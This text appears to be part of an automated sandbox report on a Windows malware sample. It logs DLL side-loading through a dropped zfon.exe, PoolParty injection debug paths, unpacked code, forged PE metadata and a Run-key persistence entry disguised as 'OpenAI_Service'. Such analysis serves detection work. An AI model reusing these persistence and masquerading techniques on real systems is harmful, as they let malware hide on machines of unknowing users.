Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: libcef.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: msvcp140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: down.lnk.12.drLNK file: ..\..\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: nrGkqbCyKP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: nrGkqbCyKP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: nrGkqbCyKP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr
Source: Binary string: C:\projects\hydra\main\Release_X64\sceneProd\sceneSourceCef.pdb source: zfon.exe, zfon.exe, 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.dr
Source: Binary string: D:\code\personal\soft_distribute_tags\code\CSharpInstaller16\obj\Release\monodelphous.pdb source: nrGkqbCyKP.exe
Source: Binary string: d:\agent\_work\2\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000007.00000002.2080942034.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000016.00000002.2198134102.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, zfon.exe, 00000019.00000002.2198456266.00007FFBAD2A2000.00000002.00000001.01000000.0000000C.sdmp, MSVCP140.dll.0.dr
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdb source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\Nash0r\Desktop\safe\Cproject\dll_Hijack\PoolParty-main\x64\Release\PoolParty.pdbC source: zfon.exe, 00000007.00000002.2059202761.0000026ADFDD5000.00000002.10000000.00040000.00000000.sdmp, zfon.exe, 00000007.00000002.2058693773.0000026ADFC50000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000007.00000002.2079700917.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000016.00000002.2198621409.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, zfon.exe, 00000019.00000002.2199060774.00007FFBB50E3000.00000002.00000001.01000000.0000000D.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000007.00000002.2079334826.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000016.00000002.2198959258.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, zfon.exe, 00000019.00000002.2199433518.00007FFBBC155000.00000002.00000001.01000000.0000000E.sdmp, vcruntime140_1.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeUnpacked PE file: 7.2.zfon.exe.7ff79cfb0000.0.unpack
Source: nrGkqbCyKP.exeStatic PE information: 0xAF9558D9 [Mon May 7 21:53:29 2063 UTC]
Source: nrGkqbCyKP.exeStatic PE information: real checksum: 0xe5a4 should be: 0x14393
Source: zfon.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x293a39
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: MSVCP140.dll.0.drStatic PE information: section name: .didat
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 7_2_0000026ADFD684DB push dword ptr [esp+eax-76h]; ret 7_2_0000026ADFD684E0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47A9F00CF pushad ; iretd 8_2_000001E47A9F00D0
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4F3CA9 push eax; ret 8_2_000001E47C4F3CAA
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4F3D26 push eax; ret 8_2_000001E47C4F3D27
Source: C:\Windows\hh.exeCode function: 8_2_000001E47C4F3D09 push eax; ret 8_2_000001E47C4F3D0A
Source: C:\Windows\explorer.exeCode function: 12_2_00B700AE push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exeCode function: 12_2_00B700AE push esp; retf 12_2_00B700B8
Source: C:\Windows\explorer.exeCode function: 12_2_00B7002D push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exeCode function: 12_2_00B7005B push esi; retf 12_2_00B700AD
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF5876 push ds; retf 12_2_0AAF5877
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF6172 push 8348FFFFh; ret 12_2_0AAF617A
Source: C:\Windows\explorer.exeCode function: 12_2_0AAF77A1 push ebx; iretd 12_2_0AAF77A6

Persistence and Installation Behavior

barindex
Source: C:\Windows\hh.exeFile created: C:\ProgramData\kernelquick.sysJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\vcruntime140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\MSVCP140.dllJump to dropped file
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcefJump to dropped file
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeJump to dropped file
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeFile created: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\libcefJump to dropped file
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_ServiceJump to behavior
Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OpenAI_ServiceJump to behavior
Source: C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exeCode function: 6_2_00007FFBC1B66580 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00007FFBC1B66580
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\hh.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE VenkernalData_infoJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\nrGkqbCyKP.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
